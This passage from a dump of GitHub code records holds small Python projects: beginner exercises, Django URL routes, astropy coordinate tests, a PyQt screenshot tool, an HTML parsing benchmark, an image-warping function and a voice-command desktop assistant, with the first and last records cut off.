\"c\",\r\n \"ppt\":\"power point presentation\",\r\n \"html\": \"html\",\r\n \"jpeg\":\"image\"\r\n }\r\n#print(myDict)\r\nfile = input(\"Input the file name: \")\r\nsplit = file.split(\".\")\r\nfor x in myDict:\r\n \r\n if(split[-1]==x):\r\n print(\"The extension of the file is : \"+ \"'\"+myDict[x]+\"'\")\r\n \r\n\r\n","repo_name":"Aswini2001/task1-python","sub_path":"extension.py","file_name":"extension.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31513070162","text":"\nfrom Utilities import show_pic\nfrom Wind import *\n\nclass Hole:\n def __init__(self):\n self.zones = []\n self.starting_position = (0.0, 0.0)\n self.goal_position = (0.0, 0.0)\n self.goal_zone = []\n self.name = \"\"\n self.number = 0\n self.par = 0\n self.wind = Wind()\n\n def is_in_goal(self, the_frisbee_coordinate):\n for zone in self.goal_zone:\n if zone.has_coord(the_frisbee_coordinate):\n return True\n return False\n\n def get_current_zone(self, the_frisbee_coordinate):\n for zone in self.zones:\n if zone.has_coord(the_frisbee_coordinate):\n return zone\n return None\n\n # gives tour of the hole, says wind, player says something\n def tour(self):\n print(\"Next hole is hole number \" + str(self.number) + \", \" + self.name + \". 
It is par \" + str(self.par) + \".\")\n raw_input(\"Press enter to see a tour of the hole: \")\n for zone in self.zones:\n show_pic(zone.picture)\n # time.sleep(0.6)\n show_pic(self.zones[0].picture)\n print(self.wind.to_string())","repo_name":"ndjenkins85/Code","sub_path":"Frisbee Golf/Hole.py","file_name":"Hole.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73208471365","text":"num = int(input()) # 컴퓨터의 수\r\nv = int(input()) # 연결선의 수\r\n\r\ngraph = [[] for i in range(num+1)] # 그래프 초기화\r\n\r\nvisited = [False]*(num+1) # 방문한 컴퓨터인지 표시 \r\n\r\nfor i in range(v): # 그래프 생성\r\n a, b = map(int, input().split())\r\n graph[a] += [b] # a에 b연결\r\n graph[b] += [a] # b에 a연결 -> 양방향\r\n \r\ndef DFS(v):\r\n visited[v] = 1\r\n for j in graph[v]:\r\n if visited[j] == 0:\r\n DFS(j)\r\n \r\nDFS(1)\r\nprint(sum(visited)-1)","repo_name":"qewr1234/beakjoon","sub_path":"9. DFS/바이러스.py","file_name":"바이러스.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"29532856299","text":"# Q- find greatest of three num using recursion?\n# def greatest(a,b,c):\n# if(a>b or a>c):\n# print(f\"{a} is greatest\")\n# elif(b>a or b>c):\n# print(f\"{b} is greatest\")\n# else:\n# print(f\"{c} is greator\")\n\n# A = greatest(1,2,3)\n# print(A)\n\ndef great(n1,n2,n3):\n if(n1>n2):\n greater = n1\n else:\n greater = n2\n if(n3>greater):\n greater = n3\n return greater\n\na = great(1,34,12)\nprint(a)\n\n\n\n\n","repo_name":"teju4tech/pytohn-classes","sub_path":"chepter8-funcion&Recursion/06_greatestOF3Num.py","file_name":"06_greatestOF3Num.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"31398484237","text":"# urls.py\n\nfrom django.urls import path\nfrom . 
import views\nfrom django.conf.urls.static import static\nfrom primeveda_backend import settings\nurlpatterns = [\n path('register/', views.register, name='register'),\n path('activate///', views.activate_account, name='activate_account'),\n path('sign-in/', views.sign_in, name='sign_in'),\n path('generate-story/', views.GenerateStoryView, name='generate_story'),\n path('current-user/', views.CurrentUserDetailView, name='current-user-detail'),\n path('search/', views.SearchAPIView, name='search-api'),\n path('update-profile/', views.update_profile, name='update-profile'),\n path('getStory/', views.get_story, name='Get_top_fifty'),\n path('getStory//', views.get_story_by_id, name='Get_story_by_id'),\n path('user/last_reading/', views.get_last_reading, name='Get_user_last_story')\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"rishuriya/primeveda_backend","sub_path":"app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"11915126318","text":"from unittest import TestCase\n\nimport numpy as np\nimport pandas as pd\n\nfrom numpy.testing import assert_allclose\nfrom astropy.coordinates import SkyCoord\nfrom astropy import units as u\nfrom astropy.time import Time\nfrom astropy.io import ascii\nfrom km3net_testdata import data_path\n\nimport km3astro.coord as kc\nimport km3astro.frame as kf\n\nfrom km3astro.random import random_date\n\n\nclass TestCoord(TestCase):\n def setUp(self):\n self.n_evts = 100\n self.n_evts_funny = 1e2\n\n def test_neutrino_flip_degree(self):\n phi = np.array([97.07, 23.46, 97.07, 192.5, 333.33])\n theta = np.array([135.0, 11.97, 22.97, 33.97, 85.23])\n azi_exp = np.array([277.07, 203.46, 277.07, 12.5, 153.33])\n zen_exp = np.array([45.0, 168.03, 157.03, 146.03, 94.77])\n azi, zen = kc.neutrino_to_source_direction(phi, theta, radian=False)\n assert_allclose(azi, azi_exp)\n assert_allclose(zen, zen_exp)\n\n def test_neutrino_flip_radian(self):\n phi = np.array([97.07, 23.46, 97.07, 192.5, 333.33]) * np.pi / 180\n theta = np.array([135.0, 11.97, 22.97, 33.97, 85.23]) * np.pi / 180\n azi_exp = np.array([277.07, 203.46, 277.07, 12.5, 153.33]) * np.pi / 180\n zen_exp = np.array([45.0, 168.03, 157.03, 146.03, 94.77]) * np.pi / 180\n azi, zen = kc.neutrino_to_source_direction(phi, theta, radian=True)\n\n assert_allclose(azi, azi_exp)\n assert_allclose(zen, zen_exp)\n\n\nclass TestCoordRandom(TestCase):\n def test_sun(self):\n date = random_date(n=100)\n sun = kc.sun_local(date, loc=\"orca\")\n\n\nclass TestConvergenceAngle(TestCase):\n def test_convergence_angle(self):\n ca = kf.convergence_angle(1.5, 1.3)\n self.assertAlmostEqual(-0.00897440033130838, ca)\n\n\nclass TestUTMStuff(TestCase):\n def test_utm_zone(self):\n assert 38 == kf.utm_zone(np.pi / 180 * 42.8871)\n\n def test_longitude_of_central_meridian(self):\n self.assertAlmostEqual(0.785398163397448, kf.longitude_of_central_meridian(38))\n\n\nclass TestAntaresBenchmark(TestCase):\n def setUp(self):\n self.tol = 0.01 * u.deg\n self.gal_tol = 0.02 * u.deg\n\n def test_antares_objects(self):\n # FIXME\n antares_objects_data = ascii.read(\n data_path(\"astro/antares_astro_objects_benchmark.csv\")\n )\n for obj in antares_objects_data:\n time = Time(\" \".join([obj[\"date\"], obj[\"time\"]]))\n\n theta = np.deg2rad(obj[\"theta\"])\n phi = np.deg2rad(obj[\"phi\"])\n\n # check azimuth and zenith conversion\n azimuth, zenith = 
kc.neutrino_to_source_direction(phi, theta)\n self.assertAlmostEqual(azimuth[0], np.deg2rad(obj[\"azimuth\"]))\n self.assertAlmostEqual(zenith[0], np.deg2rad(obj[\"zenith\"]))\n\n event = kc.local_event(phi, time, theta, location=\"antares\")\n\n equat = event.fk5\n dec = equat.dec\n ra = equat.ra\n\n ref = SkyCoord(\n \" \".join([obj[\"RA-J2000\"], obj[\"DEC-J2000\"]]),\n unit=(u.hourangle, u.deg),\n frame=\"fk5\",\n )\n\n # from astropy.coordinates import Angle\n # assert np.abs(Angle(obj[\"DEC-J2000\"] + \" hours\") - event.fk5.dec) < self.tol\n # assert np.abs(obj[\"RA-J2000\"] * u.deg - event.fk5.ra) < self.tol\n\n # assert np.abs(dec - ref.fk5.dec) < 0.0001 * u.deg\n # assert np.abs(ra - ref.fk5.ra) < 0.0001 * u.deg\n\n def test_antares_coordinate_system_benchmarks(self):\n antares_objects_data = ascii.read(\n data_path(\"astro/antares_coordinate_systems_benchmark.csv\")\n )\n for obj in antares_objects_data:\n print(obj)\n time = Time(\" \".join([obj[\"date\"], obj[\"time\"]]))\n\n theta = np.deg2rad(obj[\"theta\"])\n phi = np.deg2rad(obj[\"phi\"])\n\n # check azimuth and zenith conversion\n azimuth, zenith = kc.neutrino_to_source_direction(phi, theta)\n print(\"azimuth: \", azimuth, np.rad2deg(azimuth))\n print(\"zenith: \", zenith, np.rad2deg(zenith))\n self.assertAlmostEqual(azimuth[0], np.deg2rad(obj[\"azimuth\"]))\n self.assertAlmostEqual(zenith[0], np.deg2rad(obj[\"zenith\"]))\n\n event = kc.local_event(phi, time, theta, location=\"antares\")\n print(event.fk5)\n print(event.galactic)\n\n # ref = SkyCoord(obj[\"RA-J2000\"], obj[\"DEC-J2000\"], unit=u.deg, frame=\"fk5\")\n\n assert np.abs(obj[\"DEC-J2000\"] * u.deg - event.fk5.dec) < self.tol\n assert np.abs(obj[\"RA-J2000\"] * u.deg - event.fk5.ra) < self.tol\n\n print(obj[\"gal_lat\"], event.galactic.b.deg[0])\n assert (\n np.abs(obj[\"gal_lat\"] - event.galactic.b.deg[0]) * u.deg < self.gal_tol\n )\n assert (\n np.abs(obj[\"gal_lon\"] - event.galactic.l.deg[0]) * u.deg < self.gal_tol\n )\n","repo_name":"KM3NeT/km3astro","sub_path":"tests/test_coord.py","file_name":"test_coord.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"38217862887","text":"from django.urls import include, path\n\nfrom rest_framework import routers\n\nfrom money_jars.views import CurrencyViewSet, JarViewSet, OperationViewSet, TransactionViewSet\n\n\nrouter = routers.DefaultRouter()\n\nrouter.register(r'currencies', CurrencyViewSet)\nrouter.register(r'jars', JarViewSet)\nrouter.register(r'operations', OperationViewSet)\nrouter.register(r'transactions', TransactionViewSet)\n\n\nurlpatterns = [\n path(r\"money-jars/\", include(router.urls)),\n]\n","repo_name":"gontarz/money-jars","sub_path":"app/money_jars/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28598414820","text":"# Készíts egy programot, amely bekéri a felhasználó nevét és életkorát. 
Ezután írd ki a \n# képernyőre üdvözlő üzenetet, amely tartalmazza a felhasználó nevét és azt az évet amikor született\n\nname = input(\"add meg a nevedet: \")\nage = int(input(\"add meg a korod: \"))\n\nborn = 2023 - age\n\nprint(\"neved: \", name)\nprint(\"született: \", born)\n\n\n\n","repo_name":"kadocsabenjamin/python","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"hu","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"73737368644","text":"\nfrom PyQt6 import QtCore, QtGui, QtWidgets\nfrom Imageprocessing import Full\n\n\nclass Ui_Form(QtWidgets.QMainWindow, Full):\n def __init__(self):\n super().__init__()\n def setupUi(self, Form):\n Form.setObjectName(\"Form\")\n Form.resize(314, 414)\n icon = QtGui.QIcon.fromTheme(\"python\")\n Form.setWindowIcon(icon)\n self.Heading = QtWidgets.QLabel(Form)\n self.Heading.setGeometry(QtCore.QRect(20, 10, 271, 51))\n font = QtGui.QFont()\n font.setPointSize(22)\n self.Heading.setFont(font)\n self.Heading.setStyleSheet(\"\")\n self.Heading.setAlignment(QtCore.Qt.AlignmentFlag.AlignCenter)\n self.Heading.setObjectName(\"Heading\")\n self.widget = QtWidgets.QWidget(Form)\n self.widget.setGeometry(QtCore.QRect(40, 80, 231, 291))\n self.widget.setObjectName(\"widget\")\n self.verticalLayout = QtWidgets.QVBoxLayout(self.widget)\n self.verticalLayout.setContentsMargins(0, 0, 0, 0)\n self.verticalLayout.setObjectName(\"verticalLayout\")\n self.Normal = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Normal.setFont(font)\n self.Normal.setObjectName(\"Normal\")\n self.buttonGroup = QtWidgets.QButtonGroup(Form)\n self.buttonGroup.setObjectName(\"buttonGroup\")\n self.buttonGroup.addButton(self.Normal)\n self.verticalLayout.addWidget(self.Normal, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Face = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Face.setFont(font)\n self.Face.setObjectName(\"Face\")\n self.buttonGroup.addButton(self.Face)\n self.verticalLayout.addWidget(self.Face, 0, QtCore.Qt.AlignmentFlag.AlignHCenter) \n self.TT = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.TT.setFont(font)\n self.TT.setObjectName(\"TT\")\n self.buttonGroup.addButton(self.TT)\n self.verticalLayout.addWidget(self.TT, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Privacy = QtWidgets.QRadioButton(self.widget, clicked = lambda : Form.showMinimized())\n font = QtGui.QFont()\n font.setPointSize(16)\n self.Privacy.setFont(font)\n self.Privacy.setObjectName(\"Privacy\")\n self.buttonGroup.addButton(self.Privacy)\n self.verticalLayout.addWidget(self.Privacy, 0, QtCore.Qt.AlignmentFlag.AlignHCenter)\n self.Normal.clicked.connect(self.on_click)\n self.Face.clicked.connect(self.on_click)\n self.TT.clicked.connect(self.on_click)\n self.Privacy.clicked.connect(self.on_click)\n self.retranslateUi(Form)\n QtCore.QMetaObject.connectSlotsByName(Form)\n\n def retranslateUi(self, Form):\n _translate = QtCore.QCoreApplication.translate\n Form.setWindowTitle(_translate(\"Form\", \"Privacy Screenshot\"))\n self.Heading.setText(_translate(\"Form\", \"Choose a Mode!\"))\n self.Normal.setText(_translate(\"Form\", \"Normal\"))\n self.Face.setText(_translate(\"Form\", \"Taskbar\"))\n self.TT.setText(_translate(\"Form\", \"Tabs\"))\n 
self.Privacy.setText(_translate(\"Form\", \"Privacy (Both)\"))\n\n def on_click(self):\n if self.Normal.isChecked():\n Full.normalClicked()\n elif self.Face.isChecked():\n Full.taskbarClicked()\n elif self.TT.isChecked():\n Full.tabsClicked()\n elif self.Privacy.isChecked():\n Full.privacyClicked()\n \n\n\n\n\n\n\n","repo_name":"fromendtostart/Privacy-Screenshot","sub_path":"Window.py","file_name":"Window.py","file_ext":"py","file_size_in_byte":3699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"21212678182","text":"#!/usr/bin/env python3\n\"\"\"\nMost of calls of print function in this code\nuse double space at end of output string. It is to force\nmarkdown parser to enter new line, in case you want to put\noutput of test into markdown document.\n\nSee results of tests runned on different machines here:\nhttps://github.com/lorien/lxmlbench/wiki/Test-Results\n\"\"\"\nimport sys\nfrom argparse import ArgumentParser\nimport time\nfrom multiprocessing import cpu_count, Process, Value\nfrom urllib.request import urlopen\nimport os\n\nNUM_DOCUMENTS = 1000\nENGINES = ('lxml', 'selectolax')\n\n\ndef parse_cpu_info(key):\n try:\n with open('/proc/cpuinfo') as inp:\n for line in inp:\n if line.startswith(key):\n return line.split(':', 1)[1].strip()\n except IOError:\n pass\n return 'NA'\n\n\ndef parse_load_value():\n try:\n with open('/proc/loadavg') as inp:\n data = inp.read().splitlines()[0]\n return data.split(' ')[0]\n except IOError:\n pass\n return 'NA'\n\n\ndef thread_parser_lxml(parse_func, data, num_docs):\n while True:\n with num_docs.get_lock():\n if num_docs.value == 0:\n break\n num_docs.value -= 1\n val = num_docs.value\n dom = parse_func(data)\n assert 'reddit' in dom.xpath('//title')[0].text\n print('.', end='')\n\n\ndef thread_parser_selectolax(parse_func, data, num_docs):\n while True:\n with num_docs.get_lock():\n if num_docs.value == 0:\n break\n num_docs.value -= 1\n val = num_docs.value\n dom = parse_func(data)\n assert 'reddit' in dom.css('title')[0].text()\n print('.', end='')\n\n\ndef download_file(url, path):\n if not os.path.exists(path):\n print('Downloading %s to %s' % (url, path))\n with open(path, 'wb') as out:\n out.write(urlopen(url).read())\n\n\ndef main():\n parser = ArgumentParser()\n parser.add_argument(\n '-n', '--tasks-number', type=int, default=NUM_DOCUMENTS,\n help=(\n 'Number of documents to parse.'\n ' Default is %d' % NUM_DOCUMENTS\n ),\n )\n parser.add_argument(\n '-e', '--engine',\n default='lxml',\n help=(\n 'Parsing engine, use comma to specify multiple values.'\n ' Available engines: lxml, selectolax.'\n ' Default is lxml.'\n ),\n )\n parser.add_argument(\n '-w', '--workers',\n type=int,\n help=(\n 'Run test once, only for specified number of workers.'\n ),\n )\n opts = parser.parse_args()\n total_num_cpu = cpu_count()\n\n engine_func_reg = {\n 'lxml': {\n 'thread_func': thread_parser_lxml,\n 'parser_func': None,\n },\n 'selectolax': {\n 'thread_func': thread_parser_selectolax,\n 'parser_func': None,\n },\n }\n engines = opts.engine.split(',')\n for engine in engines:\n if engine not in ENGINES:\n sys.stderr.write(\n 'Invalid value for --engine option: %s\\n' % engine\n )\n sys.exit(1)\n elif engine == 'lxml':\n from lxml.html import fromstring\n engine_func_reg[engine]['parser_func'] = fromstring\n elif engine == 'selectolax':\n from selectolax.parser import HTMLParser\n engine_func_reg[engine]['parser_func'] = HTMLParser\n\n download_file(\n 'https://raw.githubusercontent.com'\n 
'/lorien/lxmlbench/master/data/reddit.html',\n '.reddit.html'\n )\n with open('.reddit.html') as inp:\n data = inp.read()\n\n load_val = parse_load_value()\n model_name = parse_cpu_info('model name')\n cache_size = parse_cpu_info('cache size')\n\n for engine_idx, engine in enumerate(engines):\n if engine_idx:\n # Display new line between different engine outputs\n print('')\n print('### %s' % model_name)\n print('CPU cores: %d ' % total_num_cpu)\n print('CPU cache: %s ' % cache_size)\n print('System load before test: %s ' % load_val)\n print('Documents: %d ' % opts.tasks_number)\n print('Engine: %s ' % engine)\n\n num_docs = Value('l') # l -> signed long, 4 bytes\n\n stages = []\n if opts.workers:\n stages.append(opts.workers)\n else:\n stages.append(1)\n for mult in (0.25, 0.5, 0.75, 1, 1.2):\n num = max(1, round(total_num_cpu * mult))\n if num not in stages:\n stages.append(num)\n\n for num_proc in stages:\n started = time.time()\n num_docs.value = opts.tasks_number\n print('[%d proc]' % num_proc, end=' ')\n pool = []\n\n for _ in range(num_proc):\n proc = Process(\n target=engine_func_reg[engine]['thread_func'],\n args=[\n engine_func_reg[engine]['parser_func'],\n data,\n num_docs\n ]\n )\n proc.start()\n pool.append(proc)\n [x.join() for x in pool]\n elapsed = time.time() - started\n print(' %.2f sec ' % elapsed)\n\nif __name__ == '__main__':\n main()\n","repo_name":"HoltTechnologyCorporation/lxmlbench","sub_path":"runtest.py","file_name":"runtest.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"42705043884","text":"# import tensorflow as tf\nimport numpy as np\n\n\ndef grid_sample_native(img, flow):\n \"\"\"Performs a backward warp of an image using the predicted flow.\n Args:\n img: single image. [height, width, channels]\n flow: Batch of flow vectors. 
[height, width, 2]\n Returns:\n warped: transformed image of the same shape as the input image.\n \"\"\"\n height, width, channels = img.shape\n max_x = int(height - 1)\n max_y = int(width - 1)\n\n zero = np.zeros([], np.int32)\n\n # We have to flatten our tensors to vectorize the interpolation\n im_flat = np.reshape(img, [-1, channels])\n flow_flat = np.reshape(flow, [-1, 2])\n\n # Floor the flow, as the final indices are integers\n # The fractional part is used to control the bilinear interpolation.\n flow_floor = np.floor(flow_flat).astype(np.int32)\n bilinear_weights = flow_flat - np.floor(flow_flat)\n\n # Construct base indices which are displaced with the flow\n pos_x = np.tile(np.arange(width), [height])\n grid_y = np.tile(np.expand_dims(np.arange(height), 1), [1, width])\n pos_y = np.tile(np.reshape(grid_y, [-1]), [1])\n\n x = flow_floor[:, 0]\n y = flow_floor[:, 1]\n xw = bilinear_weights[:, 0]\n yw = bilinear_weights[:, 1]\n\n # Compute interpolation weights for 4 adjacent pixels\n # expand to num_batch * height * width x 1 for broadcasting in add_n below\n wa = np.expand_dims((1 - xw) * (1 - yw), 1) # top left pixel\n wb = np.expand_dims((1 - xw) * yw, 1) # bottom left pixel\n wc = np.expand_dims(xw * (1 - yw), 1) # top right pixel\n wd = np.expand_dims(xw * yw, 1) # bottom right pixel\n\n x0 = pos_x + x\n x1 = x0 + 1\n y0 = pos_y + y\n y1 = y0 + 1\n\n x0 = np.clip(x0, zero, max_x)\n x1 = np.clip(x1, zero, max_x)\n y0 = np.clip(y0, zero, max_y)\n y1 = np.clip(y1, zero, max_y)\n\n dim1 = width * height\n batch_offsets = np.arange(1) * dim1\n base_grid = np.tile(np.expand_dims(batch_offsets, 1), [1, dim1])\n base = np.reshape(base_grid, [-1])\n\n base_y0 = base + y0 * width\n base_y1 = base + y1 * width\n idx_a = base_y0 + x0\n idx_b = base_y1 + x0\n idx_c = base_y0 + x1\n idx_d = base_y1 + x1\n\n # Ia = gather_numpy()\n Ia = np.take(im_flat, idx_a, axis=0)\n Ib = np.take(im_flat, idx_b, axis=0)\n Ic = np.take(im_flat, idx_c, axis=0)\n Id = np.take(im_flat, idx_d, axis=0)\n\n # tmp = wa * Ia\n warped_flat = wa * Ia + wb * Ib + wc * Ic + wd * Id\n warped = np.reshape(warped_flat, [height, width, channels])\n\n return warped\n\n# def grid_sample_pytorch():\n\n\ndef _ReadFlow(flow_path, w, h):\n\n with open(flow_path, 'rb') as f:\n\n data = np.fromfile(f, np.float32, count=int(w) * int(h))\n # Reshape data into 2D array (columns, rows, bands)\n return np.reshape(data, (int(h), int(w)))\n\n\nif __name__ == \"__main__\":\n\n import torch\n import cv2\n import numpy as np\n import os\n\n img_path = './experiment/image/Sk55npEXD_48513_363_ori.png'\n gt_path = './experiment/image/Sk55npEXD_48513_363_xiu.png'\n flowx_path = './experiment/flow/Sk55npEXD_48513_363_vx.bin'\n flowy_path = './experiment/flow/Sk55npEXD_48513_363_vy.bin'\n image = cv2.imread(img_path)\n GT = cv2.imread(gt_path)\n h, w, c = image.shape\n flow_array_x = _ReadFlow(flowx_path, w, h)\n flow_array_y = _ReadFlow(flowy_path, w, h)\n flow_array = np.transpose(np.array([flow_array_x, flow_array_y]), [1, 2, 0])\n\n warp_image1 = grid_sample_native(image, flow_array)\n cv2.imwrite('./experiment/output_naive.png', warp_image1.astype(np.uint8))\n","repo_name":"haddis3/grid_sample_naive","sub_path":"grid_sample_naive.py","file_name":"grid_sample_naive.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"25840403614","text":"writingData = \"aaaaaaaaaaaaaa\\n\"\nwritingData += \"ssssssssss\\n\"\nwritingData += 
\"XXXXXXXXXXX\\n\"\n\nwith open(\"read.txt\", 'a', encoding=\"utf-8\") as file:\n file.write(writingData)\n\nwith open(\"read.txt\", 'r', encoding=\"utf-8\") as file:\n dataList = file.readlines() #readLinesはリストで取得できる便利機能だが、改行文字も一緒に読み込むので注意が必要\n\n\nfor data in dataList:\n print(data[:-1])\n","repo_name":"shibafu/MyPythonTutorial","sub_path":"tsugarusoft/com/Lesson6NewFile.py","file_name":"Lesson6NewFile.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"28299356828","text":"# Python Micro Assistant : LEMON\n\nimport pyttsx3\nimport speech_recognition as sr\nimport webbrowser\nimport datetime\nimport wikipedia\n\n# method to recognize the commands given to LEMON\n# using speech_Recognition module \ndef takeCommand():\n\n\tr = sr.Recognizer()\n\n\twith sr.Microphone() as source:\n\t\tprint('Listening')\n\t\tr.adjust_for_ambient_noise(source, duration = 1)\n\n\t\t# seconds of non-speaking audio before a phrase is considered complete\n\t\tr.pause_threshold = 0.7\n\t\taudio = r.listen(source)\n\n\t\ttry:\n\t\t\tprint(\"Recognizing\")\n\t\t\tQuery = r.recognize_google(audio, language='en-IN')\n\t\t\tprint(\"Your Query = \", Query)\n\t\t\t\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\t\t\tprint(\"Pardon please\")\n\t\t\treturn \"None\"\n\t\t\n\t\treturn Query\n\ndef speak(audio):\n\t\n\tengine = pyttsx3.init()\n\n\t# gets the current value of engine property\n\tvoices = engine.getProperty('voices')\n\t\n\tengine.setProperty('voice', voices[11].id)\n\t''' \n\tvoices[11].id represents english :\n\n\t english\n\n\t# CODE to obtain the Voice ID in file check.py\n\t'''\n\tengine.say(audio)\n\t\n\t# blocks while processing all the currently queued commands\n\tengine.runAndWait()\n\ndef tellDay():\n\t\n\tday = datetime.datetime.today().weekday() + 1\n\tDay_dict = {1: 'Monday', 2: 'Tuesday',\n\t\t\t\t3: 'Wednesday', 4: 'Thursday',\n\t\t\t\t5: 'Friday', 6: 'Saturday',\n\t\t\t\t7: 'Sunday'}\n\t\n\tif day in Day_dict.keys():\n\t\tday_of_the_week = Day_dict[day]\n\t\tprint(day_of_the_week)\n\t\tspeak(\"The day is \" + day_of_the_week)\n\n\ndef tellTime():\n\t\n\ttime = str(datetime.datetime.now())\n\t\n\t# time format \"2020-06-05 17:50:14.582630\" before slicing\n\tprint(time)\n\thour = time[11:13]\n\tmin = time[14:16]\n\tspeak(\"The time is sir\" + hour + \"Hours and\" + min + \"Minutes\")\t\n\ndef Hello():\n\tspeak(\"Hello, how can I help you?\")\n\n\ndef Take_query():\n\n\tHello()\n\t\n\t# infinite loop to keep listening until\n\t# bye is said or program is terminated\n\twhile(True):\n\n\t\tquery = takeCommand().lower()\n\t\tif \"open github\" in query:\n\t\t\tspeak(\"Opening GitHub \")\n\t\t\twebbrowser.open(\"github.com\")\n\t\t\tcontinue\n\t\t\n\t\telif \"open google\" in query:\n\t\t\tspeak(\"Opening Google \")\n\t\t\twebbrowser.open(\"www.google.com\")\n\t\t\tcontinue\n\t\t\t\n\t\telif \"which day is it\" in query:\n\t\t\ttellDay()\n\t\t\tcontinue\n\t\t\n\t\telif \"what time is it\" in query:\n\t\t\ttellTime()\n\t\t\tcontinue\n\t\t\n\t\t# this will exit and terminate the program\n\t\telif \"bye\" in query:\n\t\t\tspeak(\"Bye, have a nice day!\")\n\t\t\texit()\n\t\t\n\t\telif \"from wikipedia\" in query:\n\t\t\tspeak(\"Checking the wikipedia \")\n\t\t\tquery = query.replace(\"wikipedia\", \"\")\n\t\t\t\n\t\t\t# results into summary of 4 lines (customizable) from wikipedia\n\t\t\tresult = wikipedia.summary(query, sentences = 4)\n\t\t\tspeak(\"According to wikipedia, 
\")\n\t\t\tprint(result)\n\t\t\tspeak(result)\n\t\t\n\t\telif \"what is your name\" in query:\n\t\t\tspeak(\"I am Lemon, your deskstop Assistant until you say bye\")\n\nif __name__ == '__main__':\n\tTake_query()\n","repo_name":"m0rphtail/Lemon","sub_path":"lemon.py","file_name":"lemon.py","file_ext":"py","file_size_in_byte":2900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"99"} +{"seq_id":"72020314565","text":"from hashlib import new\nimport pandas as pd\nimport json\n\ndef csv_names(file):\n name = []\n with open(file,'r') as fp:\n data = fp.readlines()\n for line in data[1:]:\n line=line.split(',')\n name.append(line[0])\n return name\n\ndef json_reader(json_file):\n red = {}\n with open(json_file,'r') as fp:\n data = json.load(fp)\n for mol in data:\n #print(mol['nam'])\n # print(mol['lsf'])\n for exc in mol['lsf']:\n if exc['exc']==1:\n #print(exc)\n red[mol['name']] = (exc['nm'],exc['HOMO'],exc['LUMO'])\n # print(red)\n # print(red)\n #print(exc)\n # for exc in mol['name']:\n # print(exc['lsf'])\n\n # print(mol['name']['lsf'])\n # for mol in data[\"molecules\"]:\n # for exc in mol[\"lsf\"]:\n # if exc['exc']==1:\n # red[mol['name']] = (exc['nm'],exc['HOMO'],exc['LUMO'])\n return red\n\ndef df_adder(filename,names,red,output):\n new_dict = {}\n for name in names:\n if name in red.keys():\n #print(name)\n new_dict[name]=red[name]\n #print(new_dict)\n df_2 = pd.read_csv(filename)\n # print(df_2)\n \n \n \n\n \n # print(df_2['HOMO Donor'])\n\n\n # print((line,'HELPP'))\n \n df = {\n 'name':[],\n 'HOMO Donor':[],\n 'LUMO Donor':[],\n \n 'HOMO Backbone':[],\n 'LUMO Backbone':[],\n 'HOMO Acceptor':[],\n 'LUMO Acceptor':[],\n 'HOMO Anchor':[],\n 'LUMO Anchor':[],\n \n\n 'homo': [],\n 'lumo':[],\n 'wave': []\n }\n '''\n \n for name in names:\n #print(df_2[0])\n ll = df_2.loc[df_2['Name'] == name]\n a = ll['HOMO Donor'].to_string()\n a = str(a[4:])\n df['HOMO Donor'].append(a)\n\n b = ll['LUMO Donor'].to_string() \n b = str(b[4:])\n df['LUMO Donor'].append(b)\n \n\n c = ll['HOMO Backbone'].to_string() \n c = str(c[4:])\n df['HOMO Backbone'].append(c)\n \n\n d = ll['LUMO Backbone'].to_string() \n d = str(d[4:])\n df['LUMO Backbone'].append(d)\n \n\n e = ll['HOMO Acceptor'].to_string() \n e = str(e[4:])\n df['HOMO Acceptor'].append(e)\n \n\n h = ll['LUMO Acceptor'].to_string() \n print(h)\n h = str(h[4:])\n df['LUMO Acceptor'].append(h)\n \n\n i = ll['HOMO Anchor'].to_string() \n i = str(i[4:])\n df['HOMO Anchor'].append(i)\n \n\n k = ll['LUMO Anchor'].to_string() \n k = str(k[4:])\n df['LUMO Anchor'].append(k)\n '''\n \n\n\n\n\n\n\n\n\n error = []\n # ignore = ['2ed_29b_7ea', '2ed_29b_5ea', '2ed_29b_11ea', '2ed_29b_10ea', '2ed_29b_9ea', '2ed_29b_6ea', '2ed_29b_2ea', '2ed_29b_3ea', '2ed_29b_1ea', '2ed_29b_4ea', '9ed_29b_1ea', '2ed_29b_8ea', 